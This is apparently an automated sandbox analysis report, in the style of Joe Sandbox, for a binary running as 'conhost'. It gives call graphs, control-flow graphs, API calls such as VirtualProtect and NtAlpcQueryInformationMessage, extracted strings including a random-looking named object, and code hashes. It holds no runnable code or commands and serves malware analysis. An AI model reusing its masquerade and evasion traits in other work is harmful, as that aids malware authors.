2765 140001394 2 API calls 2764->2765 2766 1400015d5 2765->2766 2767 140001394 2 API calls 2766->2767 2768 1400015e4 2767->2768 2769 140001394 2 API calls 2768->2769 2770 1400015f3 2769->2770 2770->2238 2772 140001394 2 API calls 2771->2772 2773 140001440 2772->2773 2774 140001394 2 API calls 2773->2774 2775 14000144f 2774->2775 2776 140001394 2 API calls 2775->2776 2777 14000145e 2776->2777 2778 140001394 2 API calls 2777->2778 2779 14000146d 2778->2779 2780 140001394 2 API calls 2779->2780 2781 14000147c 2780->2781 2782 140001394 2 API calls 2781->2782 2783 14000148b 2782->2783 2784 140001394 2 API calls 2783->2784 2785 14000149a 2784->2785 2786 140001394 2 API calls 2785->2786 2787 1400014a9 2786->2787 2788 140001394 2 API calls 2787->2788 2789 1400014b8 2788->2789 2790 140001394 2 API calls 2789->2790 2791 1400014c7 2790->2791 2792 140001394 2 API calls 2791->2792 2793 1400014d6 2792->2793 2794 1400014e5 2793->2794 2795 140001394 2 API calls 2793->2795 2796 140001394 2 API calls 2794->2796 2795->2794 2797 1400014ef 2796->2797 2798 1400014f4 2797->2798 2799 140001394 2 API calls 2797->2799 2800 140001394 2 API calls 2798->2800 2799->2798 2801 1400014fe 2800->2801 2802 140001503 2801->2802 2803 140001394 2 API calls 2801->2803 2804 140001394 2 API calls 2802->2804 2803->2802 2805 14000150d 2804->2805 2806 140001394 2 API calls 2805->2806 2807 140001512 2806->2807 2808 140001394 2 API calls 2807->2808 2809 140001521 2808->2809 2810 140001394 2 API calls 2809->2810 2811 140001530 2810->2811 2812 140001394 2 API calls 2811->2812 2813 14000153f 2812->2813 2814 140001394 2 API calls 2813->2814 2815 14000154e 2814->2815 2816 140001394 2 API calls 2815->2816 2817 14000155d 2816->2817 2818 140001394 2 API calls 2817->2818 2819 14000156c 2818->2819 2820 140001394 2 API calls 2819->2820 2821 14000157b 2820->2821 2822 140001394 2 API calls 2821->2822 2823 14000158a 2822->2823 2824 140001394 2 API calls 2823->2824 2825 140001599 2824->2825 2826 140001394 2 API calls 2825->2826 2827 1400015a8 2826->2827 2828 140001394 2 API calls 2827->2828 2829 1400015b7 2828->2829 2830 140001394 2 API calls 2829->2830 2831 1400015c6 2830->2831 2832 140001394 2 API calls 2831->2832 2833 1400015d5 2832->2833 2834 140001394 2 API calls 2833->2834 2835 1400015e4 2834->2835 2836 140001394 2 API calls 2835->2836 2837 1400015f3 2836->2837 2837->2238

                                                        Callgraph

                                                        • Executed
                                                        • Not Executed
                                                        • Opacity -> Relevance
                                                        • Disassembly available
                                                        callgraph 0 Function_0000000140001AE4 31 Function_0000000140001D40 0->31 75 Function_0000000140001BA0 0->75 1 Function_00000001400014E5 71 Function_0000000140001394 1->71 2 Function_00000001400010F0 3 Function_00000001400030F1 4 Function_00000001400057F1 5 Function_00000001400058F1 6 Function_00000001400014F4 6->71 7 Function_0000000140001800 67 Function_0000000140002290 7->67 8 Function_0000000140001E00 9 Function_0000000140005D00 34 Function_0000000140005A40 9->34 10 Function_0000000140002F00 58 Function_0000000140001370 10->58 11 Function_0000000140001000 11->8 40 Function_0000000140001750 11->40 80 Function_0000000140001FB0 11->80 87 Function_0000000140001FC0 11->87 12 Function_0000000140002500 13 Function_0000000140001503 13->71 14 Function_0000000140001404 14->71 15 Function_0000000140002104 16 Function_0000000140001E10 17 Function_0000000140003110 18 Function_0000000140005711 19 Function_0000000140005811 20 Function_0000000140001512 20->71 21 Function_0000000140002420 22 Function_0000000140002320 23 Function_0000000140005A20 24 Function_0000000140001521 24->71 25 Function_0000000140001422 25->71 26 Function_0000000140001530 26->71 27 Function_0000000140003130 28 Function_0000000140001431 28->71 29 Function_0000000140005831 30 Function_000000014000153F 30->71 31->67 32 Function_0000000140001440 32->71 33 Function_0000000140001140 48 Function_0000000140001160 33->48 35 Function_0000000140005741 36 Function_0000000140001F47 59 Function_0000000140001870 36->59 37 Function_0000000140002050 38 Function_0000000140005A50 38->34 39 Function_0000000140003150 39->10 39->13 39->24 39->25 39->26 39->28 39->30 39->32 39->34 45 Function_000000014000145E 39->45 47 Function_0000000140002660 39->47 54 Function_000000014000156C 39->54 55 Function_000000014000146D 39->55 39->58 61 Function_000000014000157B 39->61 77 Function_00000001400015A8 39->77 78 Function_00000001400014A9 39->78 86 Function_00000001400016C0 39->86 97 Function_00000001400014D6 39->97 98 Function_00000001400026E0 39->98 41 Function_0000000140001650 42 Function_0000000140005851 43 Function_0000000140003051 44 Function_000000014000155D 44->71 45->71 46 Function_0000000140002460 48->39 48->48 48->59 62 Function_0000000140001880 48->62 66 Function_0000000140001F90 48->66 48->86 49 Function_0000000140001760 99 Function_00000001400020E0 49->99 50 Function_0000000140005860 51 Function_0000000140005761 52 Function_0000000140005961 53 Function_0000000140001E65 53->59 54->71 55->71 56 Function_000000014000216F 57 Function_0000000140001A70 57->31 57->75 60 Function_0000000140003070 61->71 62->21 62->31 62->47 62->75 63 Function_0000000140005781 64 Function_0000000140005881 65 Function_0000000140005981 68 Function_0000000140002590 69 Function_0000000140003090 70 Function_0000000140002691 71->9 71->38 72 Function_0000000140002194 72->59 73 Function_000000014000219E 74 Function_0000000140001FA0 75->31 79 Function_00000001400023B0 75->79 92 Function_00000001400024D0 75->92 76 Function_00000001400057A1 77->71 78->71 81 Function_00000001400022B0 82 Function_00000001400026B0 83 Function_00000001400030B1 84 Function_00000001400058B1 85 Function_0000000140001AB3 85->31 85->75 88 Function_00000001400059C1 89 Function_0000000140001AC3 89->31 89->75 90 Function_00000001400014C7 90->71 91 Function_0000000140001FD0 93 Function_00000001400017D0 94 Function_00000001400026D0 95 Function_00000001400057D1 96 Function_0000000140001AD4 96->31 96->75 97->71 98->1 98->6 98->13 98->20 98->34 98->44 98->45 98->47 98->58 98->78 98->90 100 Function_00000001400017E0 100->99 101 Function_00000001400022E0

                                                        Control-flow Graph

                                                        APIs
                                                        • NtAlpcQueryInformationMessage.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000140001156), ref: 00000001400013F7
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3317681622.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 00000014.00000002.3317655351.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000014.00000002.3317707476.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000014.00000002.3317748709.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000014.00000002.3317773408.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_140000000_conhost.jbxd
                                                        Similarity
                                                        • API ID: AlpcInformationMessageQuery
                                                        • String ID:
                                                        • API String ID: 1866289542-0
                                                        • Opcode ID: 2826bf933b6c05314846991301916adf57e49d07940debb5eab16ace37e77d14
                                                        • Instruction ID: 35ac0efe93fe85c119e55826d4317f241f31154ff2ae5808118bfd6961f8b30b
                                                        • Opcode Fuzzy Hash: 2826bf933b6c05314846991301916adf57e49d07940debb5eab16ace37e77d14
                                                        • Instruction Fuzzy Hash: B5F09DB2608B408AEA12DB52F89579A77A0F38D7C0F00991ABBC843735DB38C190CB40

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 311 1400026e0-14000273b call 140002660 315 140002741-14000274b 311->315 316 14000280e-14000285e call 14000155d 311->316 318 140002774-14000277a 315->318 321 140002953-14000297b call 1400014c7 316->321 322 140002864-140002873 316->322 318->316 320 140002780-140002787 318->320 323 140002789-140002792 320->323 324 140002750-140002752 320->324 338 140002986-1400029c8 call 140001503 call 140005a40 321->338 339 14000297d 321->339 325 140002eb7-140002ef4 call 140001370 322->325 326 140002879-140002888 322->326 329 140002794-1400027ab 323->329 330 1400027f8-1400027fb 323->330 327 14000275a-14000276e 324->327 331 1400028e4-14000294e wcsncmp call 1400014e5 326->331 332 14000288a-1400028dd 326->332 327->316 327->318 335 1400027f5 329->335 336 1400027ad-1400027c2 329->336 330->327 331->321 332->331 335->330 340 1400027d0-1400027d7 336->340 349 140002e49-140002e84 call 140001370 338->349 350 1400029ce-1400029d5 338->350 339->338 342 1400027d9-1400027f3 340->342 343 140002800-140002809 340->343 342->335 342->340 343->327 353 1400029d7-140002a0c 349->353 357 140002e8a 349->357 352 140002a13-140002a43 wcscpy wcscat wcslen 350->352 350->353 355 140002a45-140002a76 wcslen 352->355 356 140002a78-140002aa5 352->356 353->352 358 140002aa8-140002abf wcslen 355->358 356->358 357->352 359 140002ac5-140002ad8 358->359 360 140002e8f-140002eab call 140001370 358->360 362 140002af5-140002dfb wcslen call 1400014a9 * 2 call 1400014f4 call 1400014c7 * 2 call 14000145e * 3 359->362 363 140002ada-140002aee 359->363 360->325 381 140002dfd-140002e1b call 140001512 362->381 382 140002e20-140002e48 call 14000145e 362->382 363->362 381->382
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3317681622.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 00000014.00000002.3317655351.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000014.00000002.3317707476.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000014.00000002.3317748709.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000014.00000002.3317773408.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_140000000_conhost.jbxd
                                                        Similarity
                                                        • API ID: wcslen$wcscatwcscpywcsncmp
                                                        • String ID: 0$X$\BaseNamedObjects\wbovbrapfzpyrtxpzxmouvtx$`
                                                        • API String ID: 597572034-1119163617
                                                        • Opcode ID: 34e3acc8d777564628dbf587e28aed46da3455c9ff11c4d02c64f9a5b72e75bf
                                                        • Instruction ID: a025c0863e1644071feb559a0b58112d75a513ffba1a90dc5899ac4e432c31cc
                                                        • Opcode Fuzzy Hash: 34e3acc8d777564628dbf587e28aed46da3455c9ff11c4d02c64f9a5b72e75bf
                                                        • Instruction Fuzzy Hash: 561258B2608BC081E762CB16F8443EAB7A4F789794F414215EBA957BF5EF78C189C700

                                                        Control-flow Graph

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3317681622.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 00000014.00000002.3317655351.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000014.00000002.3317707476.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000014.00000002.3317748709.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000014.00000002.3317773408.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_140000000_conhost.jbxd
                                                        Similarity
                                                        • API ID: malloc$ExceptionFilterSleepUnhandled_amsg_exit_cexit_inittermmemcpystrlen
                                                        • String ID:
                                                        • API String ID: 2643109117-0
                                                        • Opcode ID: 00ac1c66197ebc50227b88a6223cca9505f05baf94f6ca9dba6275d7e8e9b764
                                                        • Instruction ID: 853b5cb4b810d97d978816ea4420ec313e3627c3af1e5f4ec8bc55cd55e56463
                                                        • Opcode Fuzzy Hash: 00ac1c66197ebc50227b88a6223cca9505f05baf94f6ca9dba6275d7e8e9b764
                                                        • Instruction Fuzzy Hash: 2D5114B1611A4085FB16EF27F9947EA27A5BB8D7D0F849121FB4D873B6DE38C4958300

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 427 140001ba0-140001bc0 428 140001bc2-140001bd7 427->428 429 140001c09 427->429 431 140001be9-140001bf1 428->431 430 140001c0c-140001c17 call 1400023b0 429->430 437 140001cf4-140001cfe call 140001d40 430->437 438 140001c1d-140001c6c call 1400024d0 VirtualQuery 430->438 433 140001bf3-140001c02 431->433 434 140001be0-140001be7 431->434 433->434 436 140001c04 433->436 434->430 434->431 439 140001cd7-140001cf3 memcpy 436->439 442 140001d03-140001d1e call 140001d40 437->442 438->442 445 140001c72-140001c79 438->445 446 140001d23-140001d38 GetLastError call 140001d40 442->446 447 140001c7b-140001c7e 445->447 448 140001c8e-140001c97 445->448 450 140001cd1 447->450 451 140001c80-140001c83 447->451 452 140001ca4-140001ccf VirtualProtect 448->452 453 140001c99-140001c9c 448->453 450->439 451->450 455 140001c85-140001c8a 451->455 452->446 452->450 453->450 456 140001c9e 453->456 455->450 457 140001c8c 455->457 456->452 457->456
                                                        APIs
                                                        • VirtualQuery.KERNEL32(?,?,?,?,0000000140007C14,0000000140007C14,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001C63
                                                        • VirtualProtect.KERNEL32(?,?,?,?,0000000140007C14,0000000140007C14,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001CC7
                                                        • memcpy.MSVCRT ref: 0000000140001CE0
                                                        • GetLastError.KERNEL32(?,?,?,?,0000000140007C14,0000000140007C14,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001D23
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3317681622.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 00000014.00000002.3317655351.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000014.00000002.3317707476.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000014.00000002.3317748709.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000014.00000002.3317773408.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_140000000_conhost.jbxd
                                                        Similarity
                                                        • API ID: Virtual$ErrorLastProtectQuerymemcpy
                                                        • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
                                                        • API String ID: 2595394609-2123141913
                                                        • Opcode ID: d18d1f09fdfba77917c7540234edc89a1ae34ad00b66a5eb73fbe7bf19acb5c3
                                                        • Instruction ID: ec64a22a3afb06751a644bfa6223830d5787557f53419172101f724c34e2370a
                                                        • Opcode Fuzzy Hash: d18d1f09fdfba77917c7540234edc89a1ae34ad00b66a5eb73fbe7bf19acb5c3
                                                        • Instruction Fuzzy Hash: FB4143F1601A4586FA26DF47F884BE927A0E78DBC4F554126EF0E877B1DA38C586C700

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 458 140002104-14000210b 459 140002111-140002128 EnterCriticalSection 458->459 460 140002218-140002221 458->460 461 14000220b-140002212 LeaveCriticalSection 459->461 462 14000212e-14000213c 459->462 463 140002272-140002280 460->463 464 140002223-14000222d 460->464 461->460 465 14000214d-140002159 TlsGetValue GetLastError 462->465 466 140002241-140002263 DeleteCriticalSection 464->466 467 14000222f 464->467 468 14000215b-14000215e 465->468 469 140002140-140002147 465->469 466->463 470 140002230-14000223f 467->470 468->469 471 140002160-14000216d 468->471 469->461 469->465 470->466 471->469
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3317681622.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 00000014.00000002.3317655351.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000014.00000002.3317707476.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000014.00000002.3317748709.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000014.00000002.3317773408.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_140000000_conhost.jbxd
                                                        Similarity
                                                        • API ID: CriticalSection$DeleteEnterErrorLastLeaveValue
                                                        • String ID:
                                                        • API String ID: 926137887-0
                                                        • Opcode ID: 27e192ecc5d799857d1c8385dbaaf5a6f836238ff6c117ed4402dc7d43894369
                                                        • Instruction ID: 697f876828b5171767c564f6bb86c971c65e3a042cbe6cf173943f1c4610416a
                                                        • Opcode Fuzzy Hash: 27e192ecc5d799857d1c8385dbaaf5a6f836238ff6c117ed4402dc7d43894369
                                                        • Instruction Fuzzy Hash: D521E0B1715A0292FA5BEB53F9583E923A0B76CBD0F444021FB1E576B4DB7A8986C300

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 474 140001e10-140001e2d 475 140001e3e-140001e48 474->475 476 140001e2f-140001e38 474->476 478 140001ea3-140001ea8 475->478 479 140001e4a-140001e53 475->479 476->475 477 140001f60-140001f69 476->477 478->477 482 140001eae-140001eb3 478->482 480 140001e55-140001e60 479->480 481 140001ecc-140001ed1 479->481 480->478 485 140001f23-140001f2d 481->485 486 140001ed3-140001ee2 signal 481->486 483 140001eb5-140001eba 482->483 484 140001efb-140001f0a call 140005ff0 482->484 483->477 490 140001ec0 483->490 484->485 495 140001f0c-140001f10 484->495 488 140001f43-140001f45 485->488 489 140001f2f-140001f3f 485->489 486->485 491 140001ee4-140001ee8 486->491 488->477 489->488 490->485 492 140001eea-140001ef9 signal 491->492 493 140001f4e-140001f53 491->493 492->477 496 140001f5a 493->496 497 140001f12-140001f21 signal 495->497 498 140001f55 495->498 496->477 497->477 498->496
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3317681622.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 00000014.00000002.3317655351.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000014.00000002.3317707476.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000014.00000002.3317748709.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000014.00000002.3317773408.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_140000000_conhost.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: CCG
                                                        • API String ID: 0-1584390748
                                                        • Opcode ID: 112abc6df4a3a955ea7a6242a2a3ec18b1e193b9e50968186ba58eaa7180ca05
                                                        • Instruction ID: 838ee2c544bf2803730cc930bbb0f4a86f91135578be0a2b6e08d954fec56f6a
                                                        • Opcode Fuzzy Hash: 112abc6df4a3a955ea7a6242a2a3ec18b1e193b9e50968186ba58eaa7180ca05
                                                        • Instruction Fuzzy Hash: A72159B1A0110642FA77DA1BB5943FA1182ABCD7E4F258535BF1A473F9DE3C88828241

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 499 140001880-14000189c 500 1400018a2-1400018f9 call 140002420 call 140002660 499->500 501 140001a0f-140001a1f 499->501 500->501 506 1400018ff-140001910 500->506 507 140001912-14000191c 506->507 508 14000193e-140001941 506->508 509 14000194d-140001954 507->509 510 14000191e-140001929 507->510 508->509 511 140001943-140001947 508->511 514 140001956-140001961 509->514 515 14000199e-1400019a6 509->515 510->509 512 14000192b-14000193a 510->512 511->509 513 140001a20-140001a26 511->513 512->508 516 140001b87-140001b98 call 140001d40 513->516 517 140001a2c-140001a37 513->517 518 140001970-14000199c call 140001ba0 514->518 515->501 519 1400019a8-1400019c1 515->519 517->515 520 140001a3d-140001a5f 517->520 518->515 523 1400019df-1400019e7 519->523 526 140001a7d-140001a97 520->526 524 1400019e9-140001a0d VirtualProtect 523->524 525 1400019d0-1400019dd 523->525 524->525 525->501 525->523 529 140001b74-140001b82 call 140001d40 526->529 530 140001a9d-140001afa 526->530 529->516 536 140001b22-140001b26 530->536 537 140001afc-140001b0e 530->537 540 140001b2c-140001b30 536->540 541 140001a70-140001a77 536->541 538 140001b5c-140001b6c 537->538 539 140001b10-140001b20 537->539 538->529 543 140001b6f call 140001d40 538->543 539->536 539->538 540->541 542 140001b36-140001b57 call 140001ba0 540->542 541->515 541->526 542->538 543->529
                                                        APIs
                                                        • VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000140001247), ref: 00000001400019F9
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3317681622.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 00000014.00000002.3317655351.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000014.00000002.3317707476.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000014.00000002.3317748709.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000014.00000002.3317773408.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_140000000_conhost.jbxd
                                                        Similarity
                                                        • API ID: ProtectVirtual
                                                        • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.
                                                        • API String ID: 544645111-395989641
                                                        • Opcode ID: a6faf70e8b190511a78e30de1eab31b3fdd89b936d163022cdfacdbb5805c305
                                                        • Instruction ID: bed1886f8e7b3562c786f91e2c2504e2a336d35a61311b426e06807153cec951
                                                        • Opcode Fuzzy Hash: a6faf70e8b190511a78e30de1eab31b3fdd89b936d163022cdfacdbb5805c305
                                                        • Instruction Fuzzy Hash: 415114B6B11544DAEB12CF67F840BE827A1A759BE8F548212FB1D077B4DB38C986C700

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 547 140001800-140001810 548 140001812-140001822 547->548 549 140001824 547->549 550 14000182b-140001867 call 140002290 fprintf 548->550 549->550
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3317681622.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 00000014.00000002.3317655351.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000014.00000002.3317707476.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000014.00000002.3317748709.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000014.00000002.3317773408.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_140000000_conhost.jbxd
                                                        Similarity
                                                        • API ID: fprintf
                                                        • String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                        • API String ID: 383729395-3474627141
                                                        • Opcode ID: 577444ae89d5f5a6c95c3a2f675773f7031f896e683781332b98d4dce8e5709a
                                                        • Instruction ID: a02188ec0087b42d3f25a0ad686d1475033a3de64a4a15f6bec79cad075d9a0b
                                                        • Opcode Fuzzy Hash: 577444ae89d5f5a6c95c3a2f675773f7031f896e683781332b98d4dce8e5709a
                                                        • Instruction Fuzzy Hash: 1DF09671A14A4482E612EF6AB9417ED6360E75D7C1F50D211FF4D576A5DF3CD182C310

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 553 14000219e-1400021a5 554 140002272-140002280 553->554 555 1400021ab-1400021c2 EnterCriticalSection 553->555 556 140002265-14000226c LeaveCriticalSection 555->556 557 1400021c8-1400021d6 555->557 556->554 558 1400021e9-1400021f5 TlsGetValue GetLastError 557->558 559 1400021f7-1400021fa 558->559 560 1400021e0-1400021e7 558->560 559->560 561 1400021fc-140002209 559->561 560->556 560->558 561->560
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3317681622.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 00000014.00000002.3317655351.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000014.00000002.3317707476.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000014.00000002.3317748709.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000014.00000002.3317773408.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_140000000_conhost.jbxd
                                                        Similarity
                                                        • API ID: CriticalSection$EnterErrorLastLeaveValue
                                                        • String ID:
                                                        • API String ID: 682475483-0
                                                        • Opcode ID: ef714723185b3a8d2aed80037f9450dbdc245cd35eb766ee46406a0163f8cc51
                                                        • Instruction ID: 8e08899b71d5d6c295770fc95a4fa8b22c720a8a39741bac27afb53efd3d8dea
                                                        • Opcode Fuzzy Hash: ef714723185b3a8d2aed80037f9450dbdc245cd35eb766ee46406a0163f8cc51
                                                        • Instruction Fuzzy Hash: C201B2B5705A0192FA5BDB53FE083E86360B76CBD1F454061EF0957AB4DF79C996C200